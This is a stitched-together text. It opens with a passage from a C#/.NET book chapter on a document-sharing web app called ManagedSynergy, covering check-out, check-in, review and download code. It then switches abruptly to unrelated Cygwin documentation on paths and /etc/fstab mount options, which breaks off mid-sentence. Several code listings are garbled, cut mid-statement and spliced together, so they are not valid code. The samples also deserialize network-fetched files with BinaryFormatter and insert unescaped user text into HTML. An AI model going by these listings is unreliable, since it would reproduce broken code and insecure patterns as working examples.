InternetBaton resource. This would solve the problem of managing the changes to the project file, as well as sharing the result. Therefore in this implementation the project file itself is not a link that the user adds but instead is an internal link that the application manages behind the scenes. From the user's perspective, the project file somehow gets magically shared. In reality, there is no magic at all. It is yet another example of collaboration in action. Let's see how all this gets done. public void AddProjectToBaton() { ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); // Save the project data to the shared directory Save(); // Add yourself to InternetBaton which will initially point // participants to this new added project Baton.Add(UserID, this.Name, this.Name); } As you can see, there is not a lot of code required in this method either. First, the project data is saved to disk in the shared directory. Saving to the shared directory allows others to access it as InternetBaton redirects their Web request to this server. Once the file is safely saved to disk, the only thing left is to add a link to this newly created project file to InternetBaton. The story here is not complete until we factor in the Project.Save() method. public void Save() { // Create the directory if it does not already exist if (!Directory.Exists(m_ProjectPath)) Directory.CreateDirectory(m_ProjectPath); // Creates a project if one does not exist or updates its contents // if project does exist FileStream ProjectStream = (FileStream)File.Create(m_ProjectPath + "\\" + Name); // Create a serializer that will know how to persist BinaryFormatter Serializer = new BinaryFormatter(); // Persist the state of the project to the project file Serializer.Serialize(ProjectStream, this); // Free the file handle since there is no telling when, or even if, GC // will get around to it. ProjectStream.Close(); } The Save() method starts by ensuring that the shared project directory exists. The code creates the specified directory and any missing directories in between the root and the specified directory: Directory.CreateDirectory(m_ProjectPath); This shared directory lives in the virtual path of the ManagedSynergy Web site so that it is accessible for the redirection of requests by InternetBaton. Next, a file stream is created so that it can be passed to the serializer. The serializer uses the meta information associated with the object itself to write out the state of the object in a way that allows it to be read back in. This serialization is the format of our project file. When these steps are complete, the only thing left to do is to close the file stream, which frees up the file handle. Notice that we need to explicitly close the stream rather than depend on it being freed when the object is destroyed. This task is typically carried out by the garbage collector, which is not even guaranteed to run during an application session. At this point, we know how this application opens existing project files or creates new ones. Next, we examine how the user adds items to this project. Adding a Project Item When adding a project item, we assume that the user has already created a project and is ready to add an item to that project. The screen shot in Figure 4-4 shows the Add page. As you can see, the user specifies the display name for the new item, the URL of the shared document, and a brief description of the shared document. Jumping right to the code behind this form, we have the following: Figure 4-4 Add Page for ManagedSynergy. namespace ManagedSynergy { using System;; using System.IO; public class AddForm : System.Web.UI.Page { protected System.Web.UI.WebControls.RequiredFieldValidator m_UrlValidator; protected System.Web.UI.WebControls.RequiredFieldValidator m_NameValidator; protected System.Web.UI.WebControls.Label m_ExceptionMessage; protected System.Web.UI.WebControls.ValidationSummary m_AddItemValidSummary; protected System.Web.UI.WebControls.RequiredFieldValidator m_DescriptionValidator; protected System.Web.UI.WebControls.Button m_AddButton; protected System.Web.UI.WebControls.TextBox m_DescriptionTB; protected System.Web.UI.WebControls.TextBox m_UrlTB; protected System.Web.UI.WebControls.TextBox m_NameTB; protected System.Web.UI.WebControls.Label m_ProjectLabel; public AddForm() { Page.Init += new System.EventHandler(Page_Init); } protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { // Get the project data stored in the Application object Project Proj = (Project)Page.Application.Contents["Project"]; // Set the project name in the page heading m_ProjectLabel.Text = Proj.Name; } }_AddButton.Click += new System.EventHandler (this.AddButton_Click); this.Load += new System.EventHandler (this.Page_Load); } public void AddButton_Click (object sender, System.EventArgs arg) { // Retrieve project data that was saved in the Application object Project Proj = (Project)Page.Application.Contents["Project"]; try { // Add this new project item to the project Proj.AddItem(m_NameTB.Text, m_UrlTB.Text, m_DescriptionTB.Text); // Point browser to the project page Response.Redirect("ProjectPage.aspx"); } catch (System.Exception e) { string UserID = (string)Page.Application.Contents["User"]; string ProjectUrl = (string)Page.Application.Contents["ProjectUrl"]; // Re-load the project data since it may be out of sync Project.Load(ref Proj, UserID, ProjectUrl); // Display a message on the form informing user about error m_ExceptionMessage.Text = e.Message; } } } } The only item we need to discuss in this listing is the AddButton_Click() method. Once the user fills out the form and then clicks the Add button, the AddButton_Click() method is invoked. The first thing that happens is that the project object is retrieved from the application object. The code inside the try block adds the new item to the project and then returns to the project page. Looking once more in the Project.cs source file reveals the following code from the Project.AddItem() method: public void AddItem(string ItemName, string ItemUrl, string Description) { ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); // Check out the project file so we can add an item CheckOut(); try { // Create a new item to add to project ProjectItem Item = new ProjectItem(this, ItemName, ItemUrl, Description, InitialApprovalStatus, "[Initial Check In]", 0); // Add item to Baton Baton.Add(UserID, this.Name, ItemName); // Add the item to project m_ProjectItems.Add(Item); // Save the project data to the project file (in effect updating it) Save(); // Check in the project file which will point the other users to // the project file we just modified. All in all, project file is // // not kept locked all that long. CheckIn(); } catch { // Since we were unsuccessful in our attempt to take this action // we need to undo the check out we did for the project UndoCheckOut(); // Re-throw so that others can perform exception handling throw new Exception("Could not add item to \"" + m_ProjectPath + Name + "\". The disk may be full or ..."); } } After creating the InternetBaton object, this code calls the Project.CheckOut() method, which checks out the project file. This step is necessary because adding an item to the project changes the state of the project file, requiring us to first check it out. We then create a new item based on the values passed to the AddItem() method. After creating the new item, we add it to InternetBaton using the Web service method Baton.Add(). We add the newly created object to the m_ProjectItems array, save the project file to its shared location, and then check the project file back in using the Project.CheckIn() method. We need to mention a couple of things. First, we chose the ArrayList as the type for the m_ProjectItems member of the project class because it acts like an array but has a dynamic quality that allows it to grow as new elements are added. Therefore we got the best qualities of an array without the usual drawback of worrying about whether the array is big enough. Second, we need to discuss exception handling. The first thing we do is check out the project file, and the last thing we do is check it back in. What if something happens before we are able to check the project file back in? For example, if the disk were full and the Save() method caused an exception, we would skip checking in the project and the other participants would not be able to access the project file because it would still be locked. The try/catch block is used to solve this dilemma. If anything causes an exception after the point at which the project file is checked out, then the catch block will catch the exception and undo the check-out. The catch block also rethrows the exception with an associated specialized message. If we do not rethrow the exception then our catch handler would have totally handled it, and the caller would be unaware of the problem. In this application, the exception rethrow is caught by the presentation code, and a proper message (based on the error message we set) can be shown to the user. Take a look at the AddButton_Click() method in the previous listing to examine the catch handler that would catch the rethrow. This same exception handling pattern is also used in several other project methods. Deleting a Project Item When deleting a project item, we assume that the user has already created a project, added items to the project, and now wants to delete an item from the project. To delete an item from a project, the user must select it from the project items list box and select "Delete" on the action bar. The code for deleting an item is so similar to the code used for adding an item that it would be of little value to repeat here. The only real difference is that the code deletes an item instead of adding it. You can find the source to both AddPage.cs and DeletePage.cs on this book's Web site if you would like to compare these files for yourself. Checking out an Item When checking out an item, we assume that the user has already created a project, added items to the project, and now wants to check out an item so that it can be modified. To check an item out, users must first select it from the project items list box and then select "Check Out" on the action bar. After users confirm that they want to check the item out, the ProjectItem.CheckOut() method is called: public void CheckOut() { ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); // We need to check out the project file before we change its // state by checking out a project item m_Project.CheckOut(); try { // Make this item reflect a checked out state ReflectCheckedOutState(); // Save the project data to the project file (in effect updating it) m_Project.Save(); // Check out the project item Baton.CheckOut out of \"" + m_Project.ProjectPath + Name + "\". The disk may be full or the project file has be deleted."); } } Keep in mind that this method is part of the ProjectItem class, and in a sense it is the item attempting to check itself out. Once again, the code begins with the obligatory checking out of the project file. Checking out a file changes the state of a project item to reflect the fact that it is being revised and does not yet have a check-in comment. These changes are encapsulated in the ProjectItem.ReflectCheckedOutState() method: private void ReflectCheckedOutState() { // Checking out a file always puts it in the "in Revision" state m_AStatus = ApprovalStatus.InRevision; // Reset check in comments and set it to "To Be Determined" m_CheckInComment = "[TBD]"; } Once the state has been updated, the project object is saved to disk, after which the check-out request is made to InternetBaton. If all this goes well, the last thing to do is check the project file back in. During the design of this method, we had to consider the possibility that the desired file may have already been checked out by someone else. If it has, the check-out fails and causes an exception that takes us back to the check-out form, where the error is reported. The problem is that the state of the project will have already been written out to disk. Our solution to this dilemma was to have the exception handler that reports the error also roll back the project file by reloading it from InternetBaton using deserialization over the Internet. The code in the ConfirmCheckOut.aspx file looks like the following: public void OKButton_Click (object sender, System.EventArgs arg) { // Retrieve project that was saved in the Application object Project Proj = (Project)Page.Application.Contents["Project"]; // Get the project item that corresponds to index pass to this page ProjectItem Item = (ProjectItem)Proj.ProjectItems[s_ItemIndex]; try { // Check out the specified item Item.CheckOut(); // Point); m_ExceptionMessage.Text = e.Message; } } As you can see, the catch block first reloads the project object and then displays an error message that explains what happened. Viewing a Project Item When viewing a project item, we assume that the user has already created a project, added items to the project, and now wants to view an item's contents. To view an item from a project, the user must select it from the project items list box and then select "View" on the action bar. After a user requests to view an item, the browser points to the URL associated with the item. When we thought about how a user could download documents to work on them, we decided that it could be accomplished by selecting the Save As option in the browser. Having first checked out an item, the user could view the item and then choose the Save As option to save the document to a personal work directory. The idea is that this file in the user's work directory is the one that would later be checked back in. As we find out in the next scenario, the check-in process causes the file to be copied to the shared project directory and makes the changes public when InternetBaton is notified of the check-in. The following is the code behind the "View" callback: public void ViewButton_Click (object sender, System.EventArgs e) { if (m_ProjectListBox.SelectedIndex >= 0) { // Get the project data and the selected project item Project Proj = (Project)Page.Application.Contents["Project"]; ProjectItem ProjItem = (ProjectItem)Proj.ProjectItems[m_ProjectListBox.SelectedIndex]; // Point browser to the shared project item. This is not to be // confused with a local version of the same file, if one even // exists. This will view the most current version of this // file on whichever machine is currently holding it. Response.Redirect(ProjItem.ItemUrl); } else // Complain to user m_DetailCWC.Text = "You must select a project item before you try to view it"; } This code begins by ensuring that an item has been selected before retrieving the project data. Using the index from the list (which corresponds to the index of the correct item in the project's item array), the selected item is retrieved. At this point, we simply use the ItemUrl property to point the browser to the item in question. We merely pass it as the argument to the Response.Redirect() method. Checking in an Item When checking in an item, we assume that the user has previously checked out a project item and now wants to check that item back in. To check in an item, the user first selects it from the project items list box and then selects "Check In" on the action bar. The screen shot in Figure 4-5 shows the check-in page. To check an item in, the user needs to specify the local file that contains the author's changes and enter a brief comment explaining the changes that were made. The file being checked back in is the same one that was downloaded using the Save As option in the check-out scenario and has presumably been modified in some way. When a file is checked back in, one of the behindthe-scenes activities involves publishing the new version of the document by copying it to a standard shared location that is a subdirectory in the application's virtual root. Figure 4-5 Check-In Page for ManagedSynergy. The code behind this page fits the same pattern we covered previously when discussing similar types of requests. Once the user selects "Check In" from the action bar, the ProjectItem.CheckIn() method is called: // Checks in project item public void CheckIn(string LocalPath, string CheckInComment) { ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); // We need to check out the project file before we change its // state by checking in a project item m_Project.CheckOut(); try { // Make this item reflect a checked in state ReflectCheckedInState(CheckInComment); // Save the project data to the project file (in effect updating it) m_Project.Save(); // Publish the local item in the project directory in its shared // location Publish(LocalPath); // Check in the project item Baton.CheckIn in to \"" + m_Project.ProjectPath + Name + "\". The disk may be full or the project file has been deleted or is read-only."); } } Two aspects of this method that need to be discussed are ReflectCheckedInState() and Publish(). Checking in a file changes the state of a project item in various ways. These changes are encapsulated in the ProjectItem.ReflectCheckedInState() method, which contains the following lines of code: private void ReflectCheckedInState(string CheckInComment) { // Set the initial approval status for items in this project m_AStatus = m_Project.InitialApprovalStatus; // Reset the number of reviews for this change m_NumberOfReviews = 0; // Record the check in comments that the author made m_CheckInComment = CheckInComment; // Get rid of reviews from last document revision and start freah // with this new change m_ReviewItems.Clear(); } Checking in an item requires that the approval status be reset to an initial approval status. This initial approval status is different depending on whether there are reviewers involved. For example, if there are no reviewers, then the status is automatically "Approved." On the other hand, if there are reviewers involved, then the status is "In Review." All of this is taken care of in the ProjectItem.InitialApprovalStatus property. This is an example in which a property is not actually the value of a member variable but instead is a calculated value. You would never know it by looking at the line of code that sets the status though. The other steps that need to be followed to properly set the state on a checked-in item are resetting the number of reviews to zero, assigning the check-in comment, and clearing out all the old reviews. We mentioned that publishing a change to a project item requires it to be copied to its shared directory. The following code shows how the ProjectItem.Publish() method accomplishes this task: private void Publish(string LocalItemPath) { try { // If necessary, create the shared directory to hold project files if (!Directory.Exists(m_Project.ProjectItemsPath)) Directory.CreateDirectory(m_Project.ProjectItemsPath); // Copy file to its shared location File.Copy(LocalItemPath, m_Project.ProjectItemsPath + "\\" + Name, true); } catch { // Specialize the exception and re-throw it throw new Exception("\"" + LocalItemPath + "\" could not be published to the following shared location: \"" + m_Project.ProjectItemsPath + "\". Make sure the file path you specified above is correct and the disk is not full and that you have the correct permissions."); } } This code uses the project name to create a directory, if one does not exist, in the shared directory (which is in the virtual root of this application). This shared directory was revealed to InternetBaton when we first added the item. The static File.Copy() method is used to actually copy the file. Reviewing an Item When reviewing an item, we assume that the user has already created a project, added items to that project, and made changes to an itemand now a reviewer wants to submit a review of those changes. To submit a review, the user must first select the item from the project items list box and then select "Review" on the action bar. The screen shot in Figure 4-6 shows the review page. Reviewing an item involves entering a brief review that is based on the reviewer's assessment of the most recent changes. The reviewer specifies a good or bad verdict using the dropdown control on the form. Figure 4-6 Review Page for ManagedSynergy. The code behind this page is found in the ReviewPage.aspx file. It is so similar to patterns we have already discussed that reviewing this code would not broaden your understanding of applied .NET. Therefore we have included the code without any discussion. When the user clicks the OK button, the following code is invoked: public void OKButton_Click (object sender, System.EventArgs arg) { // Get the user name that was stored in the Application object string User = (string)Page.Application.Contents["User"]; ApprovalStatus Verdict; // Get the project data that was stored in the Application object Project Proj = (Project)Page.Application.Contents["Project"]; try { // Record the verdict of the review if (m_VerdictDDL.SelectedItem.Text == EnumToString.AStatusToString(ApprovalStatus.Approved)) Verdict = ApprovalStatus.Approved; else Verdict = ApprovalStatus.Revise; ReviewItem Review = new ReviewItem(User, m_ReviewTB.Text, Verdict); // Add the review to the project s_ProjectItem.AddReview(Review); // Point your); // Display a message on the form that informs the user about error m_ExceptionMessage.Text = e.Message; } } The code that submits the review looks like the following: public void AddReview(ReviewItem Review) { // We need to check out the project file before we change its // state by adding a review for this item m_Project.CheckOut(); try { // Add review to the review item object array m_ReviewItems.Add(Review); // Account for addition of review m_NumberOfReviews++; // Determine the approval status of this item. DetermineApprovalStatus(); // Save the project data to the project file (in effect updating it) m_Project.Save(); // add a review ... "); } } Viewing an Item's Properties When viewing an item's properties, we assume that the user has already created a project, added items to that project, and now wants to see the various properties for an item. To view an item's properties, the user must first select it from the project items list box and then select "Properties" on the action bar. The screen shot in Figure 4-7 shows the properties page. The properties for an item are shown to the right of the project items list box. Figure 4-7 Properties Page for ManagedSynergy. When implementing this function, we decided that a custom control would work quite nicely for displaying an item's properties. We needed the ability to dynamically create HTML so that each request to display an item's properties could be uniquely handled. This was especially important because the number of reviews is arbitrary. The code behind this form is as follows: public void PropertiesButton_Click (object sender, System.EventArgs e) { ManagedSynergy.localhost.Baton Baton = new ManagedSynergy.localhost.Baton(); stringName:</b></td></tr><tr><td>{0}</td></tr><tr><td><b style=\"FONT-SIZE: 14pt; FONT- FAMILY: 'Arial Narrow'\">URL:</b></td></tr><tr><td>{1}</td></tr><tr><td><b style=\"FONT-SIZE: 14pt; FONT-FAMILY: 'Arial Narrow'\">Description:</b></td></tr><tr><td>{2}</td></tr><tr><td><b style=\"FONT-SIZE: 14pt; FONT-FAMILY: 'Arial Narrow'\">Revision Status:</b></td></tr><tr><td>{3}</td></tr><tr><td><b style=\"FONT-SIZE: 14pt; FONT-FAMILY: 'Arial Narrow'\">Revision Comment:</b></td></tr><tr><td>{4}</td></tr><tr><td><b style=\"FONT- SIZE: 14pt; FONT-FAMILY: 'Arial Narrow'\">Approval Status:</b></td></tr><tr><td>{5}</td></tr><tr><td><b style=\"FONT-SIZE: 14pt; FONT-FAMILY: 'Arial Narrow'\">Reviews:</b></td></tr></table>"; string Detail; if (m_ProjectListBox.SelectedIndex >= 0) { // Get the user name that was stored in the Application object string User = (string)Page.Application.Contents["User"]; // Get the project data and the selected project item Project Proj = (Project)Page.Application.Contents["Project"]; ProjectItem ProjItem = (ProjectItem)Proj.ProjectItems[m_ProjectListBox.SelectedIndex]; RevisionStatus RStatus = (Baton.IsCheckedIn(User, Proj.Name, ProjItem.Name)) ? RevisionStatus.CheckedIn : RevisionStatus.CheckedOut; // Load up the objects that will provide the values for the format string object[] FormatArgs = {ProjItem.Name,ProjItem.ItemUrl,ProjItem.Description,EnumToString.RStatusToString(RStatus),Pro jItem.CheckInComment,EnumToString.AStatusToString(ProjItem.AStatus)}; // Create the dynamic property details for this item Detail = String.Format(DetailFormat, FormatArgs); // Add the item reviews to the end of the details string for each (ReviewItem R in ProjItem.ReviewItems) Detail += "<b>" + R.Reviewer + "'s</b> verdict was <b>" + EnumToString.AStatusToString(R.Verdict) + "</b> with this explaination:<br>" + R.Review + "<br><br>"; // Assign the property details to our custom control so it can // be rendered. m_DetailCWC.Text = Detail; } else // Complain to user m_DetailCWC.Text = "You must select a project ... "; } This code uses string formatting to fill in the placeholders that were placed in the properties HTML. The placeholders are the {N} elements found in the HTML, where N is the number corresponding to the formatting argument that is to be substituted (much like a printf() statement in C or C++). Once the placeholders have been filled in, then the reviews are appended to the HTML string we are building by looping through all the reviews and adding them one at a time. Finally, we take the resulting HTML string and assign it to the Text property of the custom control we created. The following is the complete implementation of the custom control: [DefaultProperty("Text"), ShowInToolbox(true), ToolboxData("<{0}:ItemDetail runat=server></{0}:ItemDetail>")] public class ItemDetail : System.Web.UI.WebControls.WebControl { private string text; [Bindable(true), Category("Appearance"), DefaultValue(""), Persistable(PersistableSupport.Declarative)] public string Text { get { return text; } set { text = value; } } protected override void Render(HtmlTextWriter output) { output.Write(Text); } } That is all there is to implementing a custom control. We added the Text property to make it easy for clients to associate the HTML they want to be displayed as the value of this control, but the only real requirement is that you have a Render() method with the right signature. This method is called, and it does whatever it needs to with the HtmlTextWriter argument. In our case, we just wrote out the Text property we were given. The other aspect to this custom control is how to use it in HTML. The following is a snippet from the PropertyPage.aspx file. <%@ Register</AC4:ITEMDETAIL> As you can see, the formatting for custom control is exactly like the formatting for any standard server-side control. You specify a tag prefix followed by the class name and an ID. Invoking Administration Services When invoking administration services, we assume that the user has already created a project and wants to perform some InternetBaton administration activities, such as adding a user to the project. The user merely selects "Admin" on the action bar, which causes the browser to point to the InternetBaton application. The code for this task is simple: public void AdminButton_Click (object sender, System.EventArgs e) { // Point browser to the Baton Web site for any admin tasks // like adding users, creating projects, etc. Response.Redirect(""); } Dynamic Status Updates and Overnight Project Replication As we mentioned previously, ManagedSynergy exposes Web services in addition to its application functionality. These Web services allow the state of the project to be dynamically updated, as well as allow off-hours project synchronization. As was mentioned in Chapter 2 regarding dynamic status updates, InternetBaton calls on the Web service method VersionChanged(); it is up to the Web service to reconcile itself with the new state of the project. For off-hours project synchronization, InternetBaton calls the Web service method DownloadProjectItems(), and it is up to the Web service to download each of the items in the project. Following is a look at the VersionChanged() Web service method: [WebMethod] public void VersionChanged(string ProjectID, string BatonID) { string UserID = (string)Application.Contents["User"]; Project Proj = new Project(); // Reload project object since something has changed Project.Load(ref Proj, UserID, Proj.ProjectUrl); // Overwrite old copy with updated project object Application.Contents["Project"] = Proj; } Because Web services were introduced in Chapter 2, we do not elaborate on them here other than to follow up on a Chapter 3 topic. In that chapter, we discussed the fact that the C# language supports the concept of attributes as a means to express declarative information. The [WebMethod] attribute is a good example of how beneficial attributes can be. This attribute makes it possible to create the right kind of "plumbing" to properly use the method as a Web service. Chapter 2 also explained another use of attributes when it demonstrated how easy it is to implement asynchronous Web service calls with the addition of the [SoapMethod( OneWay = true )] attribute. Attributes will surely play a significant role in .NET development as a declarative way of having significant service provided for you. The code for the VersionChanged() method leverages an application primitive we have already discussedthe Project.Load() method. Using the Load() method in this context causes the current state of the project file to be loaded into a project object, which then overwrites the outdated object. The DownloadProjectItems() Web service method is merely a pass-through to Project.DownloadProjectItems(), the method that does the real work. [WebMethod] public void DownloadProjectItems(string ProjectID, string EmailUserID) { // Download entire project Project.DownloadProectItems(ProjectID, EmailUserID); } The Project.DownloadProjectItems() looks like this: public static void DownloadProjectItems(string ProjectID, string EmailUserID) { Project Proj = new Project(); Project.Load(ref Proj, EmailUserID, ProjectID); foreach(ProjectItem Item in Proj.ProjectItems) Item.Download(); } Once again we see another method making use of Project.Load() to initialize a project object with the most current project state. Previously we mentioned that one of the benefits of the approach we took with the project class was that the methods could be cleanly called; the equivalent functionality was not redundantly coded "in-line." This was clearly the case with the Load() method, which confirms the wisdom of our design choice. Let's get back to the DownloadProjectItems() method. Once the project is loaded, the code loops through each of the project items and asks each one to download itself by calling the ProjectItem.Download() method that follows: public void Download() { WebRequest Request; FileStream LocalFile = null; Stream ItemStream = null; int BufferSize = 1024; Byte[] Buffer = new Byte[BufferSize]; int BytesRead; try { // Request HTTP access to project item Request = WebRequest.Create(m_ItemUrl); // If necessary, create the shared directory to hold project files if (!Directory.Exists(m_Project.ProjectItemsPath)) Directory.CreateDirectory(m_Project.ProjectItemsPath); // Get the Web-based stream so we can download the file ItemStream = Request.GetResponse().GetResponseStream(); // Create local file that will hold downloaded project item LocalFile = new FileStream(m_Project.ProjectItemsPath + "\\" + m_Name, FileMode.Create, FileAccess.Write); // Read from download file and write to local file until copied BytesRead = ItemStream.Read(Buffer, 0, BufferSize); while (BytesRead != 0) { LocalFile.Write(Buffer,0,BytesRead); BytesRead = ItemStream.Read(Buffer, 0, BufferSize); } } finally { // Close these streams no matter how the thread of control // leaves this method if (ItemStream != null) ItemStream.Close(); if (LocalFile != null) { // Flush any remaining data to disk LocalFile.Flush(); LocalFile.Close(); } } } This code is similar to the code used to load the project over the Internet. We use the WebRequest class to create a stream that can be used to access the contents of project items. After creating a directory to hold the downloaded items, a File stream is used to open a local file in write mode so that the contents of the project item can be copied. To copy the project item, the code simply reads from the downloaded stream and writes to the local stream until the entire file has been copied. We have used the finally construct because the file handles used by these streams need to be freed, no matter how this method is exited. Even if the code in the try block throws an exception, the code in the finally block is still executed.
https://www.informit.com/articles/article.aspx?p=25160
CC-MAIN-2020-40
refinedweb
10,303
54.93
Open and read Wave files Project description PyWave Open and read Wave files PyWave is a small extension that enables you to open and read the data of any WAVE-RIFF file. It supports PCM, IEEE-FLOAT, EXTENSIBLE and a few other wave formats (including 32 bit waves). Tiny documentation About PyWave PyWave is supposed to replace the builtin Python extension wave, which doesn't support 32-bit wave. the Wave class to open and read a wave file: Wave(path[, auto_read = False]) path - File path to a wave file auto_read - (optional) Can be set to True to read the data automatically If auto_read is enabled, the data will be stored in Wave.data The following methods are provided by the Wave class: Wave.read([max_bytes = 4096]) -> <bytes> data     Reads and returns at most <max_bytes> bytes of data. Wave.read_samples(number_of_samples) -> <bytes> data Reads and returns at most <number_of_samples> samples of data.> (only if <auto_read> was set to True) Audio data as bytes Example from PyWave import * PATH = "path/to/a/wave/file.wav" wf = Wave(PATH) print("This WAVE file has the following properties:") print(wf.channels, "channels") print(wf.frequency, "Hz sample rate") print(wf.bitrate, "bits per second") print(wf.samples, "total samples") Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/PyWave/0.1.0/
CC-MAIN-2022-40
refinedweb
233
64.91
Table of Contents CYGWINenvironment variable /etc/nsswitch.conffile /etc/nsswitch.confsyntax passwd:and group:settings db_enum:setting passwdentry db_homesetting db_shellsetting db_gecossetting cygwinschema unixschema descschema This chapter explains some key differences between the Cygwin environment and traditional UNIX systems. It assumes a working knowledge of standard UNIX commands. Cygwin supports both POSIX- and Win32-style paths. Directory delimiters may be either forward slashes or backslashes. Paths using backslashes or starting with a drive letter are always handled as Win32 paths. POSIX paths must only use forward slashes as delimiter, otherwise they are treated as Win32 paths and file access might fail in surprising ways. The usage of Win32 paths, though possible, is deprecated, since it circumvents important internal path handling mechanisms. See the section called “Using native Win32 paths” and the section called “Using the Win32 file API in Cygwin applications” for more information. existence /etc/fstab file is used to map Win32 drives and network shares into Cygwin's internal POSIX directory tree. This is a similar concept to the typical UNIX fstab file. The mount points stored in /etc/fstab are globally set for all users. Sometimes there's a requirement to have user specific mount points. The Cygwin DLL supports user specific fstab files. These are stored in the directory /etc/fstab.d and the name of the file is the Cygwin username of the user, as it's created from the Windows account database or stored in the /etc/passwd file (see the section called “Mapping Windows accounts to POSIX accounts”). The structure of the user specific file is identical to the system-wide fstab file. first field describes the block special device or remote filesystem to be mounted. On Cygwin, this is the native Windows path which the mount point links in. As path separator you MUST use a slash. Usage of a backslash might lead to unexpected results. UNC paths (using slashes, not backslashes) are allowed. If the path contains spaces these can be escaped as '\040'. The second field describes the mount point for the filesystem. If the name of the mount point contains spaces these can be escaped as '\040'.. The only two exceptions are the file system types cygdrive and usertemp. The cygdrive type is used to set the cygdrive prefix. For a description of the cygdrive prefix see the section called “The cygdrive path prefix”, for a description of the usertemp file system type see the section called “The usertemp file system type” The fourth field describes the mount options associated with the filesystem. It is formatted as a comma separated list of options. It contains at least the type of mount (binary or text) plus any additional options appropriate to the filesystem type. The list of the options, including their meaning, follows. acl - Cygwin uses the filesystem's access control lists (ACLs) to implement real POSIX permissions (default). This flag only affects filesystems supporting ACLs (NTFS, for instance) and is ignored otherwise. auto - Ignored. binary - Files default to binary mode (default). bind - Allows to remount part of the file hierarchy somewhere else. In contrast to other entries, the first field in the fstab line specifies an absolute POSIX path. This path is remounted to the POSIX path specified as the second path. The conversion to a Win32 path is done on the fly. Only the root path and paths preceding the bind entry in the fstab file are used to convert the POSIX path in the first field to an absolute Win32 path. Note that symlinks are ignored while performing this path conversion. cygexec - Treat all files below mount point as cygwin executables. dos - Always convert leading spaces and trailing dots and spaces to characters in the UNICODE private use area. This allows to use broken filesystems which only allow DOS filenames, even if they are not recognized as such by Cygwin. exec - Treat all files below mount point as executable. ihash - Always fake inode numbers rather than using the ones returned by the filesystem. This allows to use broken filesystems which don't return unambiguous inode numbers, even if they are not recognized as such by Cygwin. noacl - Cygwin ignores filesystem ACLs and only fakes a subset of permission bits based on the DOS readonly attribute. This behaviour is the default on FAT and FAT32. The flag is ignored on NFS filesystems. nosuid - No suid files are allowed (currently unimplemented). notexec - Treat all files below mount point as not executable. nouser - Mount is a system-wide mount. override - Force the override of an immutable mount point (currently "/"). posix=0 - Switch off case sensitivity for paths under this mount point (default for the cygdrive prefix). posix=1 - Switch on case sensitivity for paths under this mount point (default for all other mount points). sparse - Switch on support for sparse files. This option only makes sense on NTFS and then only if you really need sparse files. Cygwin does not try to create sparse files by default for performance reasons. text - Files default to CRLF text mode line endings. user - Mount is a user mount. While normally the execute permission bits are used to evaluate executability, this is not possible on filesystems which don't support permissions at all (like FAT/FAT32), or if ACLs are ignored on filesystems supporting them (see the aforementioned acl mount option). In these cases, the following heuristic is used to evaluate if a file is executable: Files ending in certain extensions (.exe, .com, .lnk) are assumed to be executable. Files whose first two characters are "#!", "MZ", or ":\n" are also considered to be executable. The exec option is used to instruct Cygwin that the mounted file is "executable". If the exec option is used with a directory then all files in the directory are executable. This option allows other files to be marked as executable and avoids the overhead of opening each file to check for "magic" bytes. The cygexec option is very similar to exec, but also prevents Cygwin from setting up commands and environment variables for a normal Windows program, adding another small performance gain. The opposite of these options is the notexec option, which means that no files should be marked as executable under that mount point. A correct root directory is quite essential to the operation of Cygwin. A default root directory is evaluated at startup so a fstab entry for the root directory is not necessary. If it's wrong, nothing will work as expected. Therefore, the root directory evaluated by Cygwin itself is treated as an immutable mount point and can't be overridden in /etc/fstab... unless you think you really know what you're doing. In this case, use the override flag in the options field in the /etc/fstab file. Since this is a dangerous thing to do, do so at your own risk. /usr/bin and /usr/lib are by default also automatic mount points generated by the Cygwin DLL similar to the way the root directory is evaluated. /usr/bin points to the directory the Cygwin DLL is installed in, /usr/lib is supposed to point to the /lib directory. This choice is safe and usually shouldn't be changed. An fstab entry for them is not required. nouser mount points are not overridable by a later call to mount. Mount points given in /etc/fstab are by default nouser mount points, unless you specify the option user. This allows the administrator to set certain paths so that they are not overridable by users. In contrast, all mount points in the user specific fstab file are user mount points. The fifth and sixth field are ignored. They are so far only specified to keep a Linux-like fstab file layout. Note that you don't have to specify an fstab entry for the root dir, unless you want to have the root dir pointing to somewhere entirely different (hopefully you know what you're doing), or if you want to mount the root dir with special options (for instance, as text mount). Example entries: Just a normal mount point: c:/foo /bar fat32 binary 0 0 A mount point for a textmode mount with case sensitivity switched off: C:/foo /bar/baz ntfs text,posix=0 0 0 A mount point for a Windows directory with spaces in it: C:/Documents\040and\040Settings /docs ext3 binary 0 0 A mount point for a remote directory, don't store POSIX permissions in ACLs: //server/share/subdir /srv/subdir smbfs binary,noacl 0 0 This is just a comment: # This is just a comment Set the cygdrive prefix to /mnt: none /mnt cygdrive binary 0 0 Remount /var to /usr/var: /var /usr/var none bind Assuming /var points to C:/cygwin/var, /usr/var now also points to C:/cygwin/var. This is equivalent to the Linux bind option available since Linux 2.4.0.. If you want to see the current set of mount points valid in your session, you can invoke the Cygwin tool mount without arguments: Example 3.1. Displaying the current set of mount points bash$ mountf:/cygwin/bin on /usr/bin type ntfs (binary,auto) f:/cygwin/lib on /usr/lib type ntfs (binary,auto) f:/cygwin on / type ntfs (binary,auto) e:/src on /usr/src type vfat (binary) c: on /cygdrive/c type ntfs (binary,posix=0,user,noumount,auto) e: on /cygdrive/e type vfat (binary,posix=0,user,noumount,auto) You can also use the mount command to add new mount points, and the umount to delete them. However, since they are only stored in memory, these mount points will disappear as soon as your last Cygwin process ends. See mount(1) and umount(1) for more information. Apart from the unified POSIX tree starting at the / directory, UNC pathnames starting with two slashes and a server name ( //machine/share/...) are supported as well. They are handled as POSIX paths if only containing forward slashes. There's also a virtual directory // which allows to enumerate the fileservers known to the local machine with ls. Same goes for the UNC paths of the type //machine, which allow to enumerate the shares provided by the server machine. For often used UNC paths it makes sense to add them to the mount table (see the section called “The Cygwin Mount Table” so they are included in the unified POSIX path tree. As already outlined in the section called “File Access”, you can access arbitary drives on your system by using the cygdrive path prefix. The default value for this prefix is /cygdrive, and a path to any drive can be constructed by using the cygdrive prefix and appending the drive letter as subdirectory, like this: bash$ ls -l /cygdrive/f/somedir This lists the content of the directory 